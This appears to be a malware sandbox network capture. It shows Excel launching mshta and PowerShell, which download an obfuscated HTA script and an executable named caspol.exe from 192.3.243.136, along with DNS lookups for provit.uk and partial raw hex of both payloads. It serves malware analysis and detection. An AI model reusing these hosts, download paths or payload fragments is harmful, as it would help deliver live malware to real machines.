Nov 21, 2024 01:21:04.283548117 CET	192.168.2.22	8.8.8.8	0xa646	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:21:04.638588905 CET	192.168.2.22	8.8.8.8	0xa646	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:21:04.774233103 CET	192.168.2.22	8.8.8.8	0xa646	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:21:04.898086071 CET	192.168.2.22	8.8.8.8	0xa646	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 21, 2024 01:20:29.188765049 CET	8.8.8.8	192.168.2.22	0xa5cd	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:20:33.391810894 CET	8.8.8.8	192.168.2.22	0x92c0	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:20:33.533752918 CET	8.8.8.8	192.168.2.22	0x92c0	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:20:33.756114006 CET	8.8.8.8	192.168.2.22	0x92c0	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:20:33.898008108 CET	8.8.8.8	192.168.2.22	0x92c0	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:21:04.283046961 CET	8.8.8.8	192.168.2.22	0xa646	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:21:04.637976885 CET	8.8.8.8	192.168.2.22	0xa646	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:21:04.773153067 CET	8.8.8.8	192.168.2.22	0xa646	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:21:04.897454023 CET	8.8.8.8	192.168.2.22	0xa646	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 21, 2024 01:21:05.032355070 CET	8.8.8.8	192.168.2.22	0xa646	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

provit.uk

192.3.243.136

94.156.177.41

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49162	192.3.243.136	80	3400	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:20:31.327749968 CET	397	OUT	GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.243.136 Connection: Keep-Alive
Nov 21, 2024 01:20:32.545392036 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 00:20:32 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 20 Nov 2024 01:22:20 GMT ETag: "2c850-6274dfb369376" Accept-Ranges: bytes Content-Length: 182352 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 38 25 32 35 32 32 25 32 35 32 35 33 43 73 63 72 69 70 74 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 25 32 35 32 35 32 31 2d 2d 25 32 35 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 35 32 38 25 32 35 32 35 32 32 25 32 35 32 35 32 35 33 43 25 32 35 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 32 35 33 45 25 32 35 32 35 32 35 30 41 25 32 35 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 35 32 30 68 74 74 70 [TRUNCATED] Data Ascii: <script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252522%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CscRipt%25252520Type%2525253D%25252522TexT/vbsCRipT%25252522%2525253E%2525250ADim%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
Nov 21, 2024 01:20:32.545435905 CET	1236	IN	Data Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
Nov 21, 2024 01:20:32.545453072 CET	1236	IN	Data Raw: 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 Data Ascii: 252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25
Nov 21, 2024 01:20:32.545519114 CET	1236	IN	Data Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509ejJJoj
Nov 21, 2024 01:20:32.545542002 CET	896	IN	Data Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
Nov 21, 2024 01:20:32.545592070 CET	1236	IN	Data Raw: 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 Data Ascii: 2509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525
Nov 21, 2024 01:20:32.545607090 CET	1236	IN	Data Raw: 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 Data Ascii: 9%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525252C%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525250
Nov 21, 2024 01:20:32.545623064 CET	1236	IN	Data Raw: 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 Data Ascii: 5252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2
Nov 21, 2024 01:20:32.545636892 CET	1236	IN	Data Raw: 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 Data Ascii: 2509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525
Nov 21, 2024 01:20:32.545680046 CET	1236	IN	Data Raw: 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 Data Ascii: 9%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525250
Nov 21, 2024 01:20:32.665435076 CET	1236	IN	Data Raw: 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 Data Ascii: 5252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49164	192.3.243.136	80	3644	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:20:36.075798035 CET	474	OUT	GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Range: bytes=8896- Connection: Keep-Alive Host: 192.3.243.136 If-Range: "2c850-6274dfb369376"
Nov 21, 2024 01:20:37.351902008 CET	1236	IN	HTTP/1.1 206 Partial Content Date: Thu, 21 Nov 2024 00:20:36 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 20 Nov 2024 01:22:20 GMT ETag: "2c850-6274dfb369376" Accept-Ranges: bytes Content-Length: 173456 Content-Range: bytes 8896-182351/182352 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta Data Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 [TRUNCATED] Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252
Nov 21, 2024 01:20:37.352058887 CET	224	IN	Data Raw: 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 Data Ascii: 52509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509UxtkIthyqsLFIkGMWINdfZtDNUyfSGrGiuuLxalrwPaTBJYqmFsWvkrThHzpCOpBeCZLaGGzXovaaDqkVITrwBkNhQyTpZqAgKQnlzzyoFFcajQUtGXodngK
Nov 21, 2024 01:20:37.352092981 CET	1236	IN	Data Raw: 68 6c 62 55 61 43 44 63 47 48 44 73 61 55 5a 4f 51 41 6c 63 76 4e 45 57 63 6e 6e 50 6d 49 6e 6e 44 46 54 74 45 4c 6a 4c 62 69 53 63 6e 67 70 59 59 51 58 61 69 46 52 54 70 72 77 56 51 62 4e 59 51 4e 48 72 59 51 72 63 4d 61 73 74 56 77 43 44 69 70 Data Ascii: hlbUaCDcGHDsaUZOQAlcvNEWcnnPmInnDFTtELjLbiScngpYYQXaiFRTprwVQbNYQNHrYQrcMastVwCDipvZgZJlDIiINHPspzYRbeiCiZLrRhUfOK%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25
Nov 21, 2024 01:20:37.352153063 CET	1236	IN	Data Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252
Nov 21, 2024 01:20:37.352191925 CET	1236	IN	Data Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
Nov 21, 2024 01:20:37.352229118 CET	1236	IN	Data Raw: 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 Data Ascii: 252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25
Nov 21, 2024 01:20:37.352263927 CET	1236	IN	Data Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252
Nov 21, 2024 01:20:37.352298975 CET	1236	IN	Data Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252
Nov 21, 2024 01:20:37.352334023 CET	1236	IN	Data Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
Nov 21, 2024 01:20:37.352374077 CET	1236	IN	Data Raw: 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 Data Ascii: 252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25
Nov 21, 2024 01:20:37.472297907 CET	1236	IN	Data Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49165	192.3.243.136	80	3756	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:20:45.616123915 CET	333	OUT	GET /55/caspol.exe HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.243.136 Connection: Keep-Alive
Nov 21, 2024 01:20:46.890599966 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 00:20:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 20 Nov 2024 01:04:28 GMT ETag: "92a00-6274dbb521496" Accept-Ranges: bytes Content-Length: 600576 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 35 3d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 09 00 00 20 00 00 00 00 00 00 2e 27 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 26 09 00 4f 00 00 00 00 40 09 00 7c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5=g0 .' @@ `&O@\|` H.text4 `.rsrc\|@@@.reloc`(@B'H6(^((}{rp o5{o7&0{o9}&0to{{rp(o:+%{oo;o&Xi2{o<&{o=+E\b2{oAn(}}(*0
Nov 21, 2024 01:20:46.890631914 CET	1236	IN	Data Raw: 00 be 00 00 00 03 00 00 11 02 7b 07 00 00 04 6f 1a 00 00 0a 17 8d 33 00 00 01 25 16 1f 3b 9d 6f 1b 00 00 0a 0a 02 7b 09 00 00 04 6f 1a 00 00 0a 0b 73 1c 00 00 0a 0c 02 7b 03 00 00 04 06 07 08 6f 03 00 00 06 2c 69 72 35 00 00 70 0d 08 6f 1d 00 00 Data Ascii: {o3%;o{os{o,ir5po+(r5p(( -o!r9p(("&{o#{o#+rap("&&(*L$p.0#{
Nov 21, 2024 01:20:46.890644073 CET	1236	IN	Data Raw: 00 00 0a 02 7b 0b 00 00 04 1e 1d 1e 1d 73 32 00 00 0a 6f 33 00 00 0a 02 7b 0b 00 00 04 72 b9 01 00 70 6f 34 00 00 0a 02 7b 0b 00 00 04 20 c8 00 00 00 1f 37 73 35 00 00 0a 6f 36 00 00 0a 02 7b 0b 00 00 04 1b 6f 37 00 00 0a 02 7b 0b 00 00 04 72 d3 Data Ascii: {s2o3{rpo4{ 7s5o6{o7{rpo8{o<{s:o="A"As>(?(@ ] s5(A(B{oC(B{oC(B{oC(B{oC
Nov 21, 2024 01:20:46.890661001 CET	1236	IN	Data Raw: 00 1f 20 73 35 00 00 0a 6f 36 00 00 0a 02 7b 11 00 00 04 1b 6f 37 00 00 0a 02 7b 11 00 00 04 72 53 03 00 70 6f 38 00 00 0a 20 2b 23 00 00 28 4f 00 00 0a 06 72 65 03 00 70 6f 44 00 00 0a 75 03 00 00 1b 0b 28 50 00 00 0a 72 6f 03 00 70 6f 51 00 00 Data Ascii: s5o6{o7{rSpo8 +#(OrepoDu(PropoQiI((8a_X ]X __`aX _EE(X _{a
Nov 21, 2024 01:20:46.890672922 CET	1236	IN	Data Raw: 16 00 00 04 2d 1e 72 27 04 00 70 d0 06 00 00 02 28 29 00 00 0a 6f 62 00 00 0a 73 63 00 00 0a 80 16 00 00 04 7e 16 00 00 04 2a 1a 7e 17 00 00 04 2a 1e 02 80 17 00 00 04 2a 6a 28 18 00 00 06 72 67 04 00 70 7e 17 00 00 04 6f 64 00 00 0a 74 26 00 00 Data Ascii: -r'p()obsc~~j(rgp~odt&j(rp~odt&j(rp~odt&j(rp~odt&j(rp~odt&~(eVs!(ft*0{
Nov 21, 2024 01:20:46.890683889 CET	1236	IN	Data Raw: a7 05 00 70 a2 25 17 72 af 05 00 70 a2 28 31 00 00 06 2d 07 06 73 42 00 00 06 7a 06 2a 4a 02 72 b7 05 00 70 28 33 00 00 06 02 28 34 00 00 06 2a be 02 72 c1 05 00 70 28 33 00 00 06 02 02 28 34 00 00 06 17 8d 31 00 00 01 25 16 72 a7 05 00 70 a2 28 Data Ascii: p%rp(1-sBzJrp(3(4rp(3(41%rp(1,}0Crpsvowox,(oy+(z,Xi20(4(1-sBz0Z{,Frp
Nov 21, 2024 01:20:46.890696049 CET	1236	IN	Data Raw: 0c 41 00 01 00 01 00 01 00 10 00 cc 01 96 0c 49 00 03 00 05 00 01 00 10 00 9d 08 96 0c 49 00 0c 00 0d 00 80 01 10 00 0d 07 96 0c 41 00 16 00 16 00 00 00 10 00 3e 0a bf 0a 41 00 16 00 17 00 00 01 10 00 0f 0b bf 0a a5 00 18 00 20 00 01 00 10 00 8c Data Ascii: AIIA>A iA#i5iyBL=PS3W[s_c}_cg$gS1PP[__4cocg
Nov 21, 2024 01:20:46.890739918 CET	1236	IN	Data Raw: 00 00 00 01 00 92 08 00 00 01 00 3e 02 00 00 02 00 78 01 00 00 01 00 bf 0b 00 00 02 00 d8 01 00 00 03 00 7f 0c 00 00 01 00 c1 0c 00 00 02 00 34 07 00 00 01 00 e0 08 00 00 02 00 54 05 00 00 01 00 e0 08 00 00 02 00 54 05 00 00 01 00 e0 08 00 00 02 Data Ascii: >x4TTTTTT49O>x*5s
Nov 21, 2024 01:20:46.890750885 CET	1236	IN	Data Raw: 00 63 00 95 03 2e 00 6b 00 bf 03 2e 00 73 00 cc 03 49 00 9b 00 5e 03 c3 00 83 00 1b 04 c3 00 8b 00 16 04 c3 00 93 00 16 04 e3 00 93 00 16 04 e3 00 83 00 5d 04 c0 02 7b 00 16 04 27 00 2b 00 49 00 8d 00 0a 01 0f 01 15 01 1b 01 1f 01 b3 01 ce 01 df Data Ascii: c.k.sI^]{'+I~%g+u++++j1 3k:K8
